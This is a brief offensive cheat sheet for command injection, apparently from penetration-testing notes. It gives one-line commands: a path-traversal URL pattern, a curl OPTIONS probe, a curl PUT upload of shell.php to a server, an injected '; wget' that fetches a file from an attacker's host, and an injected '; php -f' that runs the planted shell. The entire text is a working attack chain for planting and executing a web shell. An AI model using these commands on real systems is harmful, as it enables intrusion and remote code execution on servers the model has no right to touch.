💉Command Injection Cheat Sheet

File Traverse:

• Copy

  website.com/file.php[?path=/]

Test HTTP options using curl:

• Copy

  curl -vX OPTIONS [website]

Upload file using CURL to website with PUT option available

• Copy

  curl --upload-file shell.php --url http://192.168.218.139/test/shell.php --http1.0

Transfer file (Try temp directory if not writable)(wget -O tells it where to store):

• Copy

  ?path=/; wget http://IPADDRESS:8000/FILENAME.EXTENTION;

Activate shell file:

• Copy

  ; php -f filelocation.php;